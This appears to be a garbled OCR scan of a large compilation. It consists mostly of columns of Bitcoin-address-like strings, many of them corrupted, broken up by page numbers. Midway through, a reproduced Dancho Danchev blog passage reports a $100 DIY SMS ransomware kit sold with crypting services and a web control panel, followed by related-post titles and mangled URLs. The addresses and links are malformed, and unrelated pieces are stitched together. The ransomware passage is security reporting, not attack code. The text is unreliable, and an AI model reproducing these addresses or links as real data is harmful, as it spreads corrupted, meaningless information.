1J4X6GJrHz3BdbGm7SqHXXH4XZfu2HdH6p 
1J51p8Q7BhJMaRAp4PaqjdE9A5JAzyP2Mxb 
1J53P6GnZJCslhfZdKYCzAa6Mkcy61wp14 
LJ55gBMfVyYxoBEJr3HpzG6m3QcHFiD6uUM 
1J562JbbgxR7hnb42TMh|t7HTja4aaGrMP 
1J5aLZJNaXuehuty7Mcn91bZ69mNjhWbnM 
1J5ctz7L6TPEJEcfGCT9EVTYHrXnpup8Hn 
1J5Djir?mMS3tFqG7xxGMM5t886uN4Ns1xp 
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1J5ipobWGXHf7TxtmeTmkKNTkbdhTgwxajL 
1J5jwUzfyympeuYTRBCP90BRyoujHs5uuu 
1LJ5jYgF4serBwWhfWytugkKZU6ndHDssHsw 
1J5MFSab9R7tWFGbV7)JF6rAmjn6052xFqF 
L5NdHbwicmU2fMzp99sJVE96xSbZCHaBe 
L5nMpiBwjkxXriR7xRzz74soBrAcohu2Mu 
1J5037VKEJ4XyuqLcPogGBtF1XQdf6LVKE 
1J5pDQCJ2nYVLNTenst7 7RJCvGV7frwBbt 
L5TRYbpLPz12GAofzf8fi3UctJF8tTdcKk 
1J5uCuidN9MZWCT7ax7MvDaZ7KRf1FJ7hj 
1J5wumNgUNsSoF8FkYWzxG9XPNDrUcHG3rL 
LJ5XBSwjQj4tSCgSPu8651FikptKxWCovxX 
1J61jpbww14EkHsaBdJorMYhFJ4PHUTDzZR 
1J63XRdt2rgGxXg92XTVv4yFc8pb4SwRRX 
1J68u6VSD72kk8fHZ5bHhhmKfghcM9o0YEP 
1)6buKwdSbAGML7B3CdzCQTcwBiaymSgy5 
1J6dYuxa7g7pnjQTxD3MWfB72kKU9McQbMe 
1J6kYzeTw761cQhbYyrXjjkcGAE7yf]gUj 
1J6m7HaLCnGHSezBkPV9pyGGSzt]18wGCq 
1J60LpAeaquDDiZGgReiYHLrVggcdcla5m 
1J6QXdbNWv5qtLy8magXTsWedNYcXFbUNu 
1J6Sn1TPwcLnW43RuLAtgfYEL4RYCukPN4 
1J6UM3PoouYJWxe5UVKVvZGs281qyoGv1b 
LJ6YKVZsvTpJPnwAnU9gqxF5aq5XW72UWi 
1)73fAF8poTLrLmCrl1WwbLG4hFQA5aPTPp 
1)7ao7UQNFYsgvEmRcTimDKs7Rr8W44gsz 
1)7GbwwtEtoxhrmCwBtSuuT4yZTxwdn8Rw 
1)7jy7BJU7KZMhinmfpfWFfo2BG5KSqGw4 
1) 7NMFt5GYpYiJrnSqmuE7ZMaoqNNHfbS2 
1)7TpWeLXinjoWBuvrQHehMc6EG]XGuirH 
1J7 UgKwGA8NMYE9QejA8ihxbw3ZGdDd8GAU 
1J7vgJWybwvruT UwQMCToyFVTMRZzsvphB 
1J7vJgw2fitE4mZ3XqoFYySsvuVSM5AP7W 
1)7yPNoe9HD5x8fYWgDZJebmcky8BvARHm 
1J82FoGDdXqg5hmfDeqtmRD1gcRw80W/7Lq 
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1J8378yCPBooKCDbDTNg6r9jLeNrwBUQJS 
LW8hv2nyLjLCTRFtZ5r2uMq1MPLi85vR]g 
1J8JNjeteczkiVm5iH2cpUN7RYPnN8qMcY1 
LJ8mqeMZRrNE3o0dwdcS/7ru7ZDyj4RgaLvf 
1J8nLagWe7xaHZNfVwDjwMPbfepn4upQt7 
1J80bEJx7tbLXuTMGNhLDpi990ShF5YTr7 
1J80omNeeWVjcmKocjRVMfug 7wWKeMio]Pj 
1J8QiIMRMEJKTokcM5vLhwcJPSevbCYSkP7 
1J8RDhdRqeEGxWAp9rnMEsKwSyDUHRmSLZ 
1J8TrFA3TBQrDxdiYhhhdDNN5bj4a8Vxip 
1J93diRpJX9RuzSfyt62ceYPHVrT 758UcL 
1J)94srbp8UUyXLiZi6SRRc8DAfeqsT2ZqU 
1)969iXg6ogDxEjuTzhFu2e7sDV2PjAGXP 
1J)9aiGDPWP741SZZ5EQkx4K8BZHOGYcGcU 
1J9aPhqtWLexX55w3o0wCkfAzqT6MyHFcvpq 
1J9bU7UC12ZntYjn8mpdTNUeVrn LLWQjnG 
1J9BYfacuuURV8QBqHBPnbxAfovuxgp4fiy 
1J9CAKve6UG1A05tx1luLcoNvun6YfxFyfA 
1J9HEJX8sZCqa3DZTkKvtVGu9JYIQyEoGS 
1J9janGYIM4NWtVKS2vWUe7Ce53AAQ2pty 
1J9jb28UZVLUVLrZVIR5LSbfYXVE3Mmb3zX 
1J9rszzzzGAZnKzZpHcD1kxUBGkCWHCpBj 
1J)9xucfSpTf8A36XLaqwzWQdxLRiSPUYKM 
1J9YMbJ1qD307f57XwLnwXn4WjHqKIs8CB 
la7Hg2z1qgSggWNhuGNybZZcnBVADrfdWZ 
LA8haQexs8YIEY5qtMvtUrhcYUdVV2sDj 
La8vLupptShzk58xaVp8yq3zJzzCEEAjj 
LA9KjrtZiNNrivlaBLduUHqyHBP55kNg2i 
LAIW2FVWtPV6888ppvDRYkKgjtuRA9ccQ 
LjabXg3GaLf9N4E8Qm5dyHjo4Ew3MxuuYp 
Lacnf2r)vVQHN9by5Tp61dnPE8jncLhskz 
LADhxF 7AYe70VpKvRelzljo9RvyTgy8mU 
LahW2xsywHbZédtbax69yquyhghLh6jsm 
LaiTlawY3qigmjymtHebSiU1WVbQB4cYs 
LAJdDwZDGLLbw1licqLDoUBRZD4gfLZgTV 
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LALJNCIZDM5uwEGW5EAfmnVSBP2P757JB 
LaMawWwTVvXgEXu9aNjbHPNsJnLSiMi8bY4 
LJANGRLEIF6EGNyJwb4XQFXkWxVNhRuBdH 
1ljaoRotyPgiVo26aGxfcp6eQQzethDyj9z 
ljaoUZu8aqL9AggDXpbmgetzjM2U7AKGfQ 
ljapUvvmpdz4uT49CSMUjqm4ngqsjJhrKu 
LArlvvTpgjJAohiNrQYGD5K2yW)JpMLDhf 
LAr49pqs8dizFN3b3ti50uS813imSGHYG 
LaRfkeJvehYp9VYWgHoPQba2z6sxXE7ZX 
laSaszM7qsCGaom/7frhBLvrErC5Y1EAjt 
LaSS7U6TJAYLT3BoF4g3dvALu63cNRVDA 
LJAVg4xsQFBpr3bTgnxXAaVj69sYtJtpS3y 
LAvvtoaf55NAmzGxnNYvVghy2Th8i3zky 
LAww48MbdSi0la3S5nx906e7g8fmMzUuUR 
LJAXFtSWZrnKmpwQsxkD5o0ScyYxic5nnr2S 
LAyfSbqRbuVp5DhnV1FWeuxtX7YcaAwYT 
1JB1So3FmMBx1TuvZEQyaoD9SAtCPsXZRgc 
1Jb31AS1Uw8SNeApjJacB lasnxEUgSinfTx 
1Jb6wGotvWPzBakDqGLojVoemtn8iD6Tqt 
1Jb7ZNP86WHNhJTFdWsx9mkKu3akN691cgU 
1JBB7BXmKg3CiZiIEFMcCiGfcnCGXTkXHV}J 
1JbC5r4ssTjuUFkKtAUHKjGLukBrgYkkqvLS 
1JBFvQd7uvefxFCskBn4ByNarhdxnSmcSv 
1JbjLL5Go88D91wFFe2sdUJ2PUQXpCR4GD 
1JBLReZCvauCLeVTxDYDcp4GcX1lqgTpjbg 
1JBmCAewb43YvK1dY1GflAJAvnkkKMNwYKZ 
1JbmMs8HvVEASo04dsA91AAsuv36psjSsCGr 
1JBMvdZAk7VMYVFLRSiK7xxntv8hHvTzm9 
1JbnA3iSJs2MypaANEuQsyPj8KfH7591Mr 
1JBpKBfCVK7dR63k2B1nKSGJ2KVnHt6nUq 
1jJBpZMA6ySa8vvyiukbGt5Qvb1VWGqSxQ 
LbqERvaZ1kSbWAQmhZmy5639dBdiNqub9 
LbqirxXuDvf95kjJeSQvYnovjrBArD5xFhT 
1JbQwKFKrW8YQAh6Lr8jffoNdERETdecLk 
1JbrCiwkTndtkeAApHbpopGVNSHMzfSxnb 
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LbRLTptfPM4wqD8n4dG8pFDNz3YankATd 
1BrX6xkdZLdZmDbxVTYxf11D1vDz7rRcl 
lbtqXg6uxRhWv1l4vEmnvGfGRIvuQ5TdQK 
1bUgz4Q8dVyzCP469cpmmFqQKq2YnR6el 
1JBwijEuT3fCbCqUu8TfmtxarF9JkoZ8Y7K 
LBzZ8WuYK4txiRvli7QExzZaszZEVVqpGe 
LbZA9USMhV1UfWHZJpobmQdfzmy3drMCG 
1LbzQAczckfdRrZxFqeDukwLUZBp2Qq)J Tyo 
LBZQQojJEpqnv6éZtgXb4NhzWZpL2ZVAjj 
1c3uYrQLxPZpPnxYhW4XjRHc2RrLKRSgp 
LC73ifcMWg8fusMf9AL8nPfV2qbLPe7tU 
1JCaUFhnuFj42qk9DeWQeSjVsfPvn5jzbG 
1JcBCZnceEewEFXiK5Mpo6rfLzfSrYAvg6 
1CC9Ib9I01LzmfFWizwW5oj6bifhyZNhufSbr 
1JCCfyfsYxzjux88wqq5BzMXYf2orb2hsp 
1JCCLtbyY]jYaCobp9YHbN6SGEFFUBk44pg 
LJCEMgQ9jF14esiGJAoT4AM8pBbjTNyURH 
1J)CFedLVhoXc4ETmsQnoH6AvK7iuDXEvhL 
1cFQpsgBjErm48YEEDxAz75ydA6RQKx6s 
LCgA9qKJ4eq41PrnxB3YjvuPFV8Xv91C2 
LCGrZA713dU4k2qRs3jffyNJcA8wYdFuT 
1JCHrdSLad5S7cMMJFnjJ8sgesQU9aFx1D 
1Cjq8SZMQSrXHaMN6VWOF4MXJAZFFYPV2 
1JCLaxovEcMKesq5QZJw9GdqKgbz8tpSKP 
LCLzVjdfdPqZVjBugqQXioTs9A60jSmawt 
LJcNw1dFKVC5zNV8mEioX7kgNEEA9rQqx5 
1cPZ9RPOW25XjFtaFx2ufmktnBMhaapgz 
1Jcq6JBLRKPgnCyHw5ZRvVWMjEYQWRseC9 
1CQxcktDvTMQ6fc9V7DmvDzYDzgevB7Qa 
1cRf9paWhKJHu9hbaxzyYXgJumtjhvw5WK 
1CufVJfhWx79hhVKNL416hKvFi8dTtgF1 
lcuR2rmwhfEyC5w1YB85Argcte68HxSiw 
1JCX5h275SSTKG9OKFoFr8HF8LJfHMYQ8s6 
1JCYGh8SrUakKBVEtVhydYuSMMxxXkLipzjr 
LJcYYXHoMiP7zwhNjFypmEwfwtfvt8aBbv 
25628 


1Jcz5UyfoRfZadGXMWLbidQTibS6kKwRpB 
1JD1Y5Ljo26Hgh249P985z3MA6iTLhMa5dr 
ld3kyyWXr7zEFd1zDMB8dfsQFZNypGkMV 
1JD3LmMXcttjH7yV1xc2hHUNrkW3u2HKcXGz 
1JD5AdTsdB6WbKmQ9npvRytz3nukKZao19X 
1DC1tZ2cNNBZz9RtvHVoBvcqLTxQygVUR 
1JDd4YLgJwnrgwGVNco63XDk1Zy658vp1J 
1jddav8GFp9K3WFwAPjLd3fDfpcjE2EG2E 
1JDdrAYfiHn4iKXtZX8JrNA8CAVZkcAirc 
1JdGfJluei5yq5XynkYtNZvw9WGmLfERd1 
1JdJ3qFFBnXbMSyuxFosniB63RxxBGY6a) 
1JdjDWxmPG8Nbq1L7ZG4r2ERt7HvilUKFe 
1JdkBjPoNnyNZpVVxDe6iqQc1EKnF88cfT 
1JdLW8awQKFSBX9HBJfNzimkvgbQ9h7wzP 
1JDMhgi8m7hk6UDQHhKaxXe3DbH8m6barwQv 
1JdrdPJmpp8uBE3vdPSiINqGfHv5d4m52cw 
LdRH2qlhlJqcofY¥kBvjnLARt2fN5ijr9 
1jdscZeo40CTE4WGBmKCUea4sWva5wRIRqG 
1JDsWw8mRmmxMJBBVu82vvUi2iBjPt2cNK 
1JDszZ1kr7GeLTYZZTVKTZNiiJ6uUPIFKUkK 
1JDUCCOHT1kDu3yurhEUGCUXCkUA8Qi2ZH 
1duhTVwBfSHzwwGmx4RcXcsUFMXWsdYDT 
YdVNvilTyfXqpbcU1yJQGiHTgfHDxpESB 
1JDxyFBskPerDuQtlLEVHF6LEUE2GDRCI1fR 
1dYuCRvrQMihWVNSJ63AeY29d5D9q2AHg 
lje5p7P4VHAB6BFv7wp90ZnXZpUKF4bxox 
1JEamdcrDrCABRYBnPLzcNBeatX1LatiWR 
1JEASNzZEBqm8RN8pwpHLtsZmeL41cYsg7 
1JEaTpQUnkqbU9FB58R7EYfdKwMzjUVXSF 
LjebN4cDAPrVhZ1m)JCbCqoF1ZLjqChHimt 
LJEbPCZYm64DRnfVHPwGn3SatkrfL7q9cxX 
LJECCByCJcRcjpjealfwCSApuUL94AFyeZ 
1JeCZPA8FEJMv4HJpQULGSEYgsEdWZuLWY 
ljeF6DaMiIR73sgcGdD7qh4coVVZ7ARhTzs 
LegqtYZnNbZd8BsWjnCKgQS5MbzTTquFN 
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1JEHeEo6aPQYVGCIM5fmjDtbyb7kojHjtg 
LJEHX7LSNTLKsy2Yv5QBJz3h3VE318bPDy 
1LJEjejJEEAFrDzahApk2vEfPhPnXhWXYRMY 
Lej/FWHudyzcMSymygqXiPjJ9tlvFWfgLoV 
LEK5gtyxZiSG5QG44y2EaNe1XniDnSYux 
LEkkBzCgdCp2Ai6xkWw99i5wSzyHVj4z6 
1JeKUuE2apMbnaviA6eL2LYnKDGDtvpR1t2 
LemfVdmsgYPW9vWcBZHecREyqSanZpQb5 
LJeNuTSQLFXP8qCLEWB42c3rRWM2FiCTvq 
Leoms5ftP9pBtymK29VqhFK8x2dYrrYo 
lJeqDMYF3yZoHLYwRV6UkuPzdqDBNApWFC 
1EqeacmmXMalE5mA44CqE8CRuJ7kxbS27 
LesiYAdtsj4kg8K3QVzZMt8ewa3En9qzVh 
LexSMxC8Rhc54qQKW9SPYJPgkhqbJkKNR8 
IEY2K3HkK8nKDtGDn2EKzxdoBu4gqrWQDvM 
Ley5c3g6KWdK5 7haJTUQ2tLDtRUZWSiHB 
IEZrZUHMHx18gBdkcKwsoCaRihQGYwmAj 
1Lf1KZKyCuH7dkQodFhejlogEavAzm4sNX 
1Lf2zmJJdyTN4ZYxq2QMaVEVH927LJD2jD 
1LJF3fgdStLcwMqp8quoMuyn7VLCHbPgfZw 
1lJF4wwa6é8vjiCQ5dgjW4LnXH63UymLyA5L 
1JF5wnR7mPLR2Cga3LUQ5XDwv6XuBC6vDr 
1f7VxDUruhMFPcxTrRUuBhGewQFp5PwGeZ 
Lf7y4KAPzychCccxTFGFeCr4u85dCvka7 
1JFOLHHMaCgBp8miGCyjpNpnipnQVGEz7H 
1JFa7FobmHvfyWxcJjgR8vMrRhPujswCtx 
1JFaEyeTjejZiYwpqlDAGxrcqTuCZNSP97 
1JFCf6yMNsUZfioaQz9sr1m68P7cCAFhdu 
1JFcuV882JFVVBfq9XMKoJP1xmt]XnqYzF 
1JFDmRJ5rjBcDc2ZZt58Wc8mreyy7eWNjz 
LJfEjQZUPAaM2DUHAtpz3rdikJJz2V2vdMMN 
1JffgGHAnDhjY6rCEay7sio8MyDAc1dtyk 
1JFGexUf7yMnGk4WkKrrHBeChDcxKrBb3x} 
1JFGUmnGNAgj2VwEyANpKw4Z32dijBrdeWw 
1JFhpwtj78dnVJ38DUyaqcfXECAMrzMuuv 
25630 


1JfL8G7dBWAVUAApDg5Bb3u1UT7gtotTCw 
LfMt2aB3VzeVpxiUtbvWCof4Gf36Ngaw3 
1JFMzzwRTrxhPVCH4Ximh8StWQwQ4Cbg3n 
1Jfn1GKSutyGLQTUveMb5foFL1IM9z1Axof 
LfFNh53ysZpErcWfQUyK1JzYeif9ewdAvd 
1JFoMBfBcNiclyFq49EJuZL5WkKYMWJF7z 
1JfRo6fK3MSjZLg83kjHE9ZreUCeEWMt6x 
LJFRrrqm49YwVrsfilnKF5uviWE5E20bWn 
1JFsCPMwDecMAxZSnkzfipTBPvyC9ALhZm 
1fsjCsJ3ke4183bcDVLkjCYSeW8M75DuQ 
1JFTFEyny5afktQgrDx8qtuzc6gcFXS5xk 
1JFtPZemvjBdWVFXuHdBNL27kyUzu7tpD5 
1JFV7HusxkzTyHvRynmjJaCkJGjsnyi125) 
1LfyPHV3b5FxVwjwua6hMT 2tMWQ6qqYCVY 
1JFZ7H1CKxfL3FidaNsYLb84xJNjYzzW8F 
1JfZRmsuTxEaarYUyx7RzxmPnFUXWhcYCP 
1lJg6D8bHEayz7S2qsU8vnNaLE2Z9GZ3JaD 
1Jjg6F3fobwpSkZ9K3bGEKutAZ5GPfKQAhSA 
1JG7ysFUuj7yHp6jqDdDD6XZds2JZQ1idkW 
1gAxMvC4RjEtRLADCEH6YCFIBEyZgg77H 
1ljgc3MBQAurxzqJHRIMZMXFMr36eqqw6Vv 
1lgcZCrCfogq2VaEEZa27b75103ks2sKwsc 
1jgDPoZW1Npng9V6YtVyAJ4WHFKW27yFXC 
1JgELK2DqXbYAe]7qsCalhwpGX5P6GBEHL 
1JGeqZSP61YmCiDG1m5PPv27rK9dDJ9QIF 
LJgFUqibJFXcvYxRMTdm9ApGuRj59rmLwb 
1JGh8EDhG48Zg4AMVg8n5sCe2zz3VT1CCd 
1JGKh9fxYqSeGywMnQktBWTANpcoxXLxxk3 
1GnyxwrtWgUf9BNkYZ6Vyy46Y3x82Sjqn 
1ljgoauld2yWFV4ax75sCkmgPNHm7WovCdr 
ljgpPg TUFwRynmXuQuTPw3tjWx4m2bwVg 
LJGsN4Jje9ncGq5519zYCE8aUtaVEWvjuBP 
1J)GuA3wbj8HssH8EmTJMnBPvZE6hTMtSjy 
1JGUSLd8aBzRysVaJBh1ju7bjq9J4QXer9 
1JGvYu2HWCEf9MxTnP9njapf8YqtV9ItbvP 
25631 


1JGXH3zYgJmZRMxcVR3UC4qRnmaSkuqGe7 
1gyNEmnGBkpuUdVpycbjmfqneJpHUL95z 
LgZkbNnKojUCEKX8FCqKB8Lw2yKuYGJ95 
LGzqrmkgir3PicSKbtvgHiaylA1xX6Cyaz 
Wh2498wqcc9pqwZoqaxX22LDEBo4xWFvsm 
1JH2jBS98EJTvzZSPRV19V7FqdB4SJTN3BW 
Wh6mGCvy2iJsptjcAFkFv7NWyz5P6huZo 
LJH8acTwb6y50dD79WgBh7ZYrJdErv4C3A 
LhA4yLqRVQ8FC6TJATCGK54h7 7oPZwcuh 
LHAuVfAKGQqWH9THhrhgaSvAKL5fjJi8RF 
LHCGnChqWwoNd77m7j4fv5fULIssgwFMfD 
LhcqPELJ2NKOHFWrPvGtSjnTJpTbgyB9k 
LHdJSzj4250zZMM2LwZZLgumZpusnGMUhX 
1JHHgMXaHgLKkooFYqeZvY1PDXZZRPe5GH 
LhHnFzxfEmMBHnLM2jTVKhogHEZuyR3sx2 
LhhrigixdrAoV8bUJeYRAiQokphsjtycQ 
Whiwm6vY9ATPINtwGcxtoh4Y5baYr9Kfe 
LJHJ9MWJshcqxX7BU2dGqaTQcSg73PUMet 
LWhk2MV8hiay9Eq9rAzh6wcKYTkgofeVaL 
LHkVPNnySmwjCmNipmg76UmkRhzyNGmWp 
1HkvyUvDBWy8YfuLQcLYQuDhGgpcBnGrB 
IJHM23E48AZQAdC7e37DCFYkKDsAntZgk89 
lJHmeTUEEB99yvywéiegichj 7rMfWCt4qm 
LHMSR6eT2gn5PmkuRdeQbmjeoEgm3kMSw 
LhmsTpm5XpaE7UhahRwGkB2ieMi4Ee151 
LhQM4CoYFc2vGSCxAYNFG3wvGKHDAKLuh 
1LJHs7xPVJs78HXkKVH1A903FrhcBZoT 7ipg 
LHSGVBu8RpMaAdkiP9JLjt6wr9r447kgw 
LhtL1f53nF2U8v5W4RpisaVd5ZH253yVs 
LWhTx57yp945GE8CASZ861V5crPTx3ZN1ly 
1JhusGoBXUBsXYujE6sJFQkKgNES6SWUj2L 
LhVRPKGdCGSqYzGkbaG3bstRgv3G5eYyp 
LWhwM5Z2aDUWbZv5Lti7EsyxmUTag7fszc 
Li1P77ZrNvqysqa362CRuku3KzuQtQkn1 
Li25GLYXvyUpZDxjYfRUubUBKP6e€GRxDXz 
25632 
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The DIY ransomware is offered for sale at $100, with the typical "value-added" services in 
the form of managed undetected binaries through crypting. Since the command and control 
interface is web based (php+mysq]), the author is actively experimenting with new features 
such as scheduled appearing of the ads, inventory of banners and affiliate program links, and 
the ability to use multiple SMS numbers next to multiple unlocking codes. 


Are the currently active ransomware "vendors" trendsetters or are they still in experi- 
mental mode? 


The business model of SMS-based ransomware is clearly lucrative, especially in situa- 
tions where cybercriminals are known to combine two or three different monetization 
tactics. However, compared to the [4]high profit-margins which cybecriminals earn through 
the scareware business model, SMS-based ransomware remains a developing market segment. 


Related posts: 

[5]6th SMS Ransomware Variant Offered for Sale 

[6]5th SMS Ransomware Variant Offered for Sale 

[7]4th SMS Ransomware Variant Offered for Sale 

[8]3rd SMS Ransomware Variant Offered for Sale 

[9]SMS Ransomware Source Code Now Offered for Sale 

[10]New ransomware locks PCs, demands premium SMS for removal 
[11]Who’s Behind the GPcode Ransomware? 

[12]ldentifying the Gpcode Ransomware Author 


This post has been reproduced from [13]Dancho Danchev’s blog. 


1. ftp: //ddanchev,blogapot.con/2008/06/shos-bebind- gpcode-ransonvare. neal 
2, tap: //www.eynantec, con/comnect ologs/brovsers-and-ransoad 

3, heep: //ww. symantec. com /consect /blogs/Layers~trojanransonpage 

4, http://ddanchey.blogepot .con/2009/04/confickere~scarevarefake-security. hall 

5. http: //ddanchev. blogspot .com/2009/06/Sth-sks-ransomuare-variant-of fered-for al 
6. heep: //ddanchev.blogapot.com/2009/0 /Sth-sks-ransonuare~ variant of fered-for heal 
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LicinGH4eEybZ6cd5CbCoyusvGTtmuzkN 
LicKSgqqVQHRK7ytRGVaeoyL3RZzwGHiVm 
LJiCQiErECg6TVd68KsJ7Uip7s2nU41Mmb 
Lid3XtZsnyuRKWNmwZjrVACzvLxF 3CBKD 
LJiDbBc6Vzv2x7LYb5jgw36bxSsH3g8Tbj 
LifCwx7 1w5g6LwuWSkmxX6aA5wau9SB13 
LihBzmuPz7dP284mvP7xx6xe5e3G27G91 
LJiMyPcpwfVaqJ5iHHtcqKEskNRfdeTDYt 
YiINDM4KMDGQwgqSDtTudjFANipbqNFwTj8f 
LJINLeEeeyJRFGgb4eASEbuqabkL5iJNZB 
LJiPYNYhoQXM5UDyCHWogqgy91ea3WnCcuH 
Lir6BckKAVNGCFXQkVTtoH23Htja5adP6o0 
LJIROEEYxNfWgqJ537JKv4gqd4BkumYSge 
LJisoPngsKDHSBBs8qzJQPDnKpXWsBXuKv 
LJitWE3uyPXsy9UKk40Fc280t7BCeAGWqT 
LiuGhHWPEKMYZKHLgBH3gQc9uK6tLWQbWh 
LJIUTEbnY5PVbuYs6jfkozbQG4wCYgV924 
LiyKpUanPEKVGUMCBoVU83hZ8uTMXrfTp 
LYiZGrTtrinjpowtQA7GFKnsxrDwhwu8asz 
LJjliamfh9JZM2X2QeypGiG53JzuuU62QHU 
LjbhqS5MSKNnk61YAc77YX6RBbpV3LiDgW 
1JjJBUSoGHB8ZRDCoASYhHHMcwdDZvgKfTSk 
1JC8i0o2Q75EkR8eq9v8SqAljiek2PLEQz 
1JjCelxgdkuLtfPUY5m6QYYG4PWY4cwqo2 
LjCILfvzsQDpSMBGaAbbVYNYNYv2ekFQo 
1LJcMMaiU9re3hPxh6aUvZgbENV 7dzwwLK 
1JJDg2D51A1QjQauyGQzsRV5xdNGzSc2SY 
1Ljg7CEPVbbRHstoM1qKhydbowJnjENTuH 
1JjG8LGwqnEYcVwsYKqDUfAYBNKCGBQSTP 
1jHuJACwXQajfxBGCaPgBKxNdFEXJasrD 
1JJiweztLi38ED7TAkKBwCbbheKtLePhSzz 
LjJ9cxF2vPykKKBUPtkaXukczE7D6N48Z9 
1JJjL7edCtpYA9p8voosjHesHypczH37tR 
1JLU2ySvN4YJVYPxmAYsSM6wDqVBUe72m5 
LJjnAtCRsnoKkxXfNWPoQgWVZzNue9x6CuA 


25633 


1JJUUBsm5fukucMtZKGfgw637hG14mSLRe 
1JjUXa75vVm3KUETnN8PdUhLMsw6bemG4uK 
LJvH2N8brRew40oAwmAWnQGPiJchjpbDyM 
LJVWyVQsipDZt80AyQg1G2yrrDgDkphUq 
LJjX5FJTIXYixpiv2akK7DuoJRhpPDcGbx4 
LJYZLLEQJR6ghfUUwqD9vNt1itlMfkjuQK 
LJY2Y3wctyNQqM4btZZHnt1VzDe2wUyWy 
Ljzr2GXacXAc5ojh8r421dAzdthMH7CB9 
1K32PaivWc9N5QpFuqmvR4BagJyZQymLB 
Lkafo2S8P2Yn2GqAMejUvpNndipUTQ5SZ 
1JKd5akKTgUH7CvFt7ghfPvfFUjd9SqgSyS 
IkdhL3csaxFBvwenWM3biWMPfjgXyJHrN 
1JkeLeDpmMRNHyGFhNZEkc444exXvhjwsCwo 
Ukh3FT69BafZahZwaqJwSwQn6btP8P7AYi 
LUkhhg6WDg6j9Cw3vShJBhCYo98BBcZXxJ9 
1kKhipUhAqrK2gdBxhrGTKHzeL9i2Htqje 
LkhKKPBdW2UgxvuJ5aqkfqLqn3iKxaViN 
LKiICtmMNUXdQ36Lin4Axqu5xLFFRjEpoo 
1KJByjqRibD50YbLujEc3hwSgQmWb1FNU 
LkjQUVOWtM1g9J8yCDODWSEfGD4fYvvpN 
IKjTZ2E8BNECBBQ4rTk5FespNNGwy6nTNAt 
UkLnr7eChwuAtARMetsQ8G2eUcZtQ6mnS 
1kMfoATwfuxYBDDQSWP1Q6Fg5nS8Hufgm 
1JKmsELkqskoEYdjkMdqTSGYH7py9xrjUM 
1kpDWARbB6Z4d3FUWM3R8t7hW5)47zgx3 
LKqWuTFimZ2YYhb8w6 lwfHMeNpVXhqkyYe 
1kRQ(MQMEB8PpN5JF7fokrR2BfJR53CZpvU 
LkrvcFRnSj61LCAfdfQ2docUR2XbVMKnKn 
1JKRXMHUE1FaueSmXCmJ6MJn7xgsrHADeL 
1JKseEW94kqqr7sa6xpsTSG7KVdNXz4J8N 
1kvDUxorneE2YZSRDNDNxXMMzKB7aL9mef 
LKWb7vKsTqgS9NQEBx7hPv7kmwUDxiQ6Mc 
1kWekKRs3ZAFMzmUiwwrMu9FjwgtBrwbf8 
LkKWwNRFFaWC2SGWWnES5LngQgMaT}T2KoMjhE 


UkyZRHBSMWhVgERtfm6tN4GBJyFylMozP 
25634 


1JL2ertBf3jmpHnx6Z7jv5qob27kKD6PMgB 
1JL4M4NFIDN4XRAChfSNMxgsznaV9S829B 
1jL5rqwjbgBeBeZyNtimCCh3iBuvgDZUo 
1JLB2bVFOGNF 1NFbjP9hrm3kYwYav2HqvxX 
1JLdDwCbh2uyPiIQMBBNn9SJbodKcyluqUo 
1JLEQQUGHOoiIMT3KYu4fPS1QcsrsrJSK4Sc 
1JLHcC1VFHGoLKtKYnpBJmRwCimuSj1baHj 
LLLTVVMEg6grVoK49tMKHhkug4EsrTjFD 
1jLothzTVug6g9TL3kcBpxwihHeSmbA71q 
1LPkgPb2FK5jav3KVnxqgh5mpLj56hxGo7 
1Lsg6vtGmh3jPTgQF23mcBRRDbEashPRs 
1JLuofauaBS1e59E7sut5V32pwabShG9nH 
1JLUs3TIHQcLgzSz4JEY3JyCAnSiJhLMSC 
1LvmzmnnRU9z7Z5hUcvEE72uTdPg9dMsP 
1JLXwpZoPYFAIGFyFfnHxPjCByJPbiyGdi 
1JmM1FBJ15MMkmifoQldhi2MeVNfT5NcmmP 
1JM1lwkeSjpzybKCiSqhFkTGV7gxMyma6Xn 
1Jm643Rpgyb24wXkNAEwJjFjFFKeNedXPH 
1Jm6hyfHJ 7sS9DNyQCTFT2iVpGMs8QvabmU 
1JM9Romk9pzSJHdEH3t7FqmodvDRhEtEVU 
1mBpb7c35hVkgJfZPYt5 Mayp3Txn3U24D 
1JMBgLYpuLT1rSJ66Ea66c8hrbyNqfDoo8 
LMCf8TWvtLijQ5f4jnXkw1LRUnVNCr5TXx 
1JMCwedU9QZberHrzzhBZmXyxcxkUbTQQ9 
1JmExkr9pC1PsATZbkT9TC8uKsrTDEgQiJ 
1JMhN3hHoYotkKKNGEFRytc9JgiGCaHqYUf 
1JMjgSjozkoWZY4xJXFwBSXntCVZGBHLSr 
1JmKenBSAvRdjQmzfV5rkV3xCRZxhvjaNx 
1mKJo5LSnJkGnJWtHvYZ7WL9e7rykyvzj 
1JMLSVHnaq6RxcbGWkmpaYBhemWpYpBAf4 
1JmMMFq2YM4qCoU7ADnsjLKoLFx8mvTesxXX 
1JMPhDvfPGosjy6VWVHh82ecxs2Tilo7TR 
LmQjGZVj5CbMznfMPVmL6gWzk6qPLVMaxX 
1JMR5JBJB6cXQTa6bHTpq2s6c2GMfqfcGH 
1mSwZrQVeVd2r6HsYD9wrQjJNoFiaQw5De 
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lmTgfH47A9LSxnSelq5eAw183onzdy3tb 
LJMuNvQzfKCjxWFHCJ2naQM5LdyTDhmTVk 
1muonQpCWcd5qfyYxQH1N7uzvHcnLH22h4 
LJMXHMBhr1ldTQkUx3Ta36FUMCT2ma9xykP 
1Jmxmq5BaB6DULQXqQH6MWGQxB1xMVoP9M 
1JmZWBMR9V7FfiIQeznSBy8TUdLELWXKh5E 
1n12HSRQg1APcD3jkKVMLaaBZAi3vLWMCz 
1n22gzf}|KmKKmtusdYuURs7j5BmMNukWF9 
1Jn5czv7B958Z8xdwFMKKj3jNHL4mtTyg2q 
1JN6n7LUaQX3HRu9ojtRwEULVZMLRihsXF 
1JN7uuTot7RipgU6aCWzTmEg25hFlyKn5u 
1JN8ZejepJdduUoajZcLeXosex8hUffGWA 
1JNa4byBH3e1s1P]yTobDhXbK6Wjz9jvzmB 
LNB7xXNVUxZrZdBm3Js8hyMRTzxyuUqcZT 
LnBrZkXEttUmMVE3Zso3Sxfabd5rhUJ6VT 
1ndgkYZp3pGVMJxr20mSh53z79A9YDvaC 
1nDVZHNfdoLJVacz9f24E6xGtS6xnPpxX5 
1JNedGd1xkhKsCwUXQA9VGZVxihLWKn1Jj 
LJNEMRYxt3io3xPP9b3bc26rwb1li9L5N4o0 
LJNHkU3tzU6ZLqBtHfZTpBUWB2YpdZuPKo 
